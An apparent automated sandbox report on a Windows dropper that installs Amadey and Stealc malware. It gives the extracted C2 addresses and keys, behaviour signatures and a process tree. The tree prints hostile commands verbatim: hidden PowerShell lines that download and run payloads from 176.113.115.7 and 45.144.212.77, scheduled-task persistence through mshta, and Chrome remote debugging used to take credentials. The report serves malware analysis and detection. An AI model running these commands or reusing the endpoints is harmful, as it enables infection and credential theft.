Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 21:29

General

  • Target

    f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe

  • Size

    938KB

  • MD5

    865b70535cac91a7fb0a5e7453798edc

  • SHA1

    bf3e1c9613ef801ad1ff939717bce851cc555282

  • SHA256

    f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c

  • SHA512

    73bf144459c82e83a2cd039d9ca2002268bc8df2aa19ff80fc5d0feb722c8dd38974daad5b8d9a9069d9cf5bb9220582cce1e8fc907f3090677ff2bbd4149138

  • SSDEEP

    24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:ATvC/MTQYxsWR7a0X

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 13 IoCs
  • Uses browser remote debugging 2 TTPs 1 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 21 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 35 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3436
      • C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
        "C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:968
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn LbktqmaHN2A /tr "mshta C:\Users\Admin\AppData\Local\Temp\HzIVJTpkb.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4508
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn LbktqmaHN2A /tr "mshta C:\Users\Admin\AppData\Local\Temp\HzIVJTpkb.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:4048
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\HzIVJTpkb.hta
          3⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4788
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1484
            • C:\Users\Admin\AppData\Local\TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
              "C:\Users\Admin\AppData\Local\TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2932
              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Adds Run key to start application
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3952
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106761121\PcAIvJ0.cmd"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3252
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                    8⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4804
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:3552
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bmqhbmdh\bmqhbmdh.cmdline"
                        10⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:4640
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES66C4.tmp" "c:\Users\Admin\AppData\Local\Temp\bmqhbmdh\CSCDEC100CD330A497DB7B61263ABA7CD3E.TMP"
                          11⤵
                          • System Location Discovery: System Language Discovery
                          PID:4660
                • C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
                  "C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4996
                  • C:\Users\Admin\AppData\Local\Temp\dll32.exe
                    "C:\Users\Admin\AppData\Local\Temp\dll32.exe"
                    8⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4024
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3FDE.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp3FDE.tmp.bat
                      9⤵
                        PID:64
                        • C:\Windows\system32\chcp.com
                          chcp 65001
                          10⤵
                            PID:876
                          • C:\Windows\system32\tasklist.exe
                            Tasklist /fi "PID eq 4024"
                            10⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3804
                          • C:\Windows\system32\find.exe
                            find ":"
                            10⤵
                              PID:4688
                            • C:\Windows\system32\timeout.exe
                              Timeout /T 1 /Nobreak
                              10⤵
                              • Delays execution with timeout.exe
                              PID:5080
                            • C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe
                              "C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"
                              10⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4660
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu
                                11⤵
                                • Uses browser remote debugging
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5364
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffe73f4cc40,0x7ffe73f4cc4c,0x7ffe73f4cc58
                                  12⤵
                                    PID:5616
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1516,i,14173812256890407501,5637588934199132520,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1508 /prefetch:2
                                    12⤵
                                      PID:5904
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1764,i,14173812256890407501,5637588934199132520,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1760 /prefetch:3
                                      12⤵
                                        PID:6136
                            • C:\Users\Admin\AppData\Local\Temp\10106930101\c7f15adc10.exe
                              "C:\Users\Admin\AppData\Local\Temp\10106930101\c7f15adc10.exe"
                              7⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:3184
                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                8⤵
                                • Downloads MZ/PE file
                                • System Location Discovery: System Language Discovery
                                PID:4028
                            • C:\Users\Admin\AppData\Local\Temp\10106940101\8264280168.exe
                              "C:\Users\Admin\AppData\Local\Temp\10106940101\8264280168.exe"
                              7⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4504
                              • C:\Users\Admin\AppData\Local\Temp\10106940101\8264280168.exe
                                "C:\Users\Admin\AppData\Local\Temp\10106940101\8264280168.exe"
                                8⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4108
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 808
                                8⤵
                                • Program crash
                                PID:1600
                            • C:\Users\Admin\AppData\Local\Temp\10106950101\4d3ec13268.exe
                              "C:\Users\Admin\AppData\Local\Temp\10106950101\4d3ec13268.exe"
                              7⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3460
                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                8⤵
                                • Downloads MZ/PE file
                                • System Location Discovery: System Language Discovery
                                PID:4504
                            • C:\Users\Admin\AppData\Local\Temp\10106960101\b668158ee9.exe
                              "C:\Users\Admin\AppData\Local\Temp\10106960101\b668158ee9.exe"
                              7⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4840
                            • C:\Users\Admin\AppData\Local\Temp\10106970101\92c1596969.exe
                              "C:\Users\Admin\AppData\Local\Temp\10106970101\92c1596969.exe"
                              7⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Downloads MZ/PE file
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              PID:3432
                              • C:\Users\Admin\AppData\Local\Temp\U84J15891JOZLM7JBAVSFVNSSQ9RMJ.exe
                                "C:\Users\Admin\AppData\Local\Temp\U84J15891JOZLM7JBAVSFVNSSQ9RMJ.exe"
                                8⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                PID:4776
                            • C:\Users\Admin\AppData\Local\Temp\10106980101\0cb1213c66.exe
                              "C:\Users\Admin\AppData\Local\Temp\10106980101\0cb1213c66.exe"
                              7⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              PID:4884
                            • C:\Users\Admin\AppData\Local\Temp\10106990101\cb1b45c480.exe
                              "C:\Users\Admin\AppData\Local\Temp\10106990101\cb1b45c480.exe"
                              7⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:4400
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /F /IM firefox.exe /T
                                8⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1504
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /F /IM chrome.exe /T
                                8⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4816
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /F /IM msedge.exe /T
                                8⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3996
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /F /IM opera.exe /T
                                8⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2932
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /F /IM brave.exe /T
                                8⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:648
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                8⤵
                                  PID:876
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                    9⤵
                                    • Checks processor information in registry
                                    • Modifies registry class
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    • Suspicious use of SetWindowsHookEx
                                    PID:4072
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {30266a67-2ec0-46b7-9470-299f5e303ae0} 4072 "\\.\pipe\gecko-crash-server-pipe.4072" gpu
                                      10⤵
                                        PID:1332
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2416 -prefsLen 28354 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f00e4370-feab-4fa3-9385-8c3f3399c507} 4072 "\\.\pipe\gecko-crash-server-pipe.4072" socket
                                        10⤵
                                          PID:2712
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2960 -childID 1 -isForBrowser -prefsHandle 3024 -prefMapHandle 3000 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ad252656-4c4d-4750-a555-aa85f7d2c44e} 4072 "\\.\pipe\gecko-crash-server-pipe.4072" tab
                                          10⤵
                                            PID:4536
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4132 -childID 2 -isForBrowser -prefsHandle 3944 -prefMapHandle 3916 -prefsLen 32844 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c62143bb-0b0e-41c7-9db9-41c9fb1c5bc6} 4072 "\\.\pipe\gecko-crash-server-pipe.4072" tab
                                            10⤵
                                              PID:760
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3708 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4844 -prefMapHandle 4840 -prefsLen 32930 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a289999c-0365-4c33-963b-a1f1c3b1875a} 4072 "\\.\pipe\gecko-crash-server-pipe.4072" utility
                                              10⤵
                                              • Checks processor information in registry
                                              PID:5512
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5184 -childID 3 -isForBrowser -prefsHandle 5176 -prefMapHandle 5160 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26983790-74cd-4e72-a201-bcb8adefde91} 4072 "\\.\pipe\gecko-crash-server-pipe.4072" tab
                                              10⤵
                                                PID:5792
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5424 -childID 4 -isForBrowser -prefsHandle 5416 -prefMapHandle 5412 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b02f980f-6f74-4b95-9a08-7f3d49abcc26} 4072 "\\.\pipe\gecko-crash-server-pipe.4072" tab
                                                10⤵
                                                  PID:5820
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 5 -isForBrowser -prefsHandle 5492 -prefMapHandle 5436 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba5b9e8d-1ed1-4271-a047-214b2c882dda} 4072 "\\.\pipe\gecko-crash-server-pipe.4072" tab
                                                  10⤵
                                                    PID:5844
                                            • C:\Users\Admin\AppData\Local\Temp\10107000101\cb56a4a560.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10107000101\cb56a4a560.exe"
                                              7⤵
                                              • Modifies Windows Defender DisableAntiSpyware settings
                                              • Modifies Windows Defender Real-time Protection settings
                                              • Modifies Windows Defender TamperProtection settings
                                              • Modifies Windows Defender notification settings
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Windows security modification
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1356
                                            • C:\Users\Admin\AppData\Local\Temp\10107010101\ktxzLhN.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10107010101\ktxzLhN.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5236
                                              • C:\Users\Admin\AppData\Local\Temp\dll32.exe
                                                "C:\Users\Admin\AppData\Local\Temp\dll32.exe"
                                                8⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1076
                                            • C:\Users\Admin\AppData\Local\Temp\10107020101\Ps7WqSx.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10107020101\Ps7WqSx.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:2016
                                            • C:\Users\Admin\AppData\Local\Temp\10107030101\FvbuInU.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10107030101\FvbuInU.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:5240
                                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                  1⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4800
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4504 -ip 4504
                                  1⤵
                                    PID:2800
                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                    1⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:2604

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dll32.exe.log

                                    Filesize

                                    1KB

                                    MD5

                                    a4423aad2b5496e1f5232802e3325b24

                                    SHA1

                                    1f7f15c374d2fc57731a67beab699566082f356b

                                    SHA256

                                    69cf0ffe10f4626bb62c4518e96ccb249e205a3b3d5452ba0cba96fab0eb83fe

                                    SHA512

                                    da4466df6250f71522bb3cfc6e625812e99f708e72dc22becee604aa4e7991c21cef8fe6c5a0b5e8a116caa5bcb3d42ee1649e5acc818949d05601c29e555e2d

                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ktxzLhN.exe.log

                                    Filesize

                                    425B

                                    MD5

                                    fff5cbccb6b31b40f834b8f4778a779a

                                    SHA1

                                    899ed0377e89f1ed434cfeecc5bc0163ebdf0454

                                    SHA256

                                    b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76

                                    SHA512

                                    1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                    Filesize

                                    2KB

                                    MD5

                                    25604a2821749d30ca35877a7669dff9

                                    SHA1

                                    49c624275363c7b6768452db6868f8100aa967be

                                    SHA256

                                    7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                                    SHA512

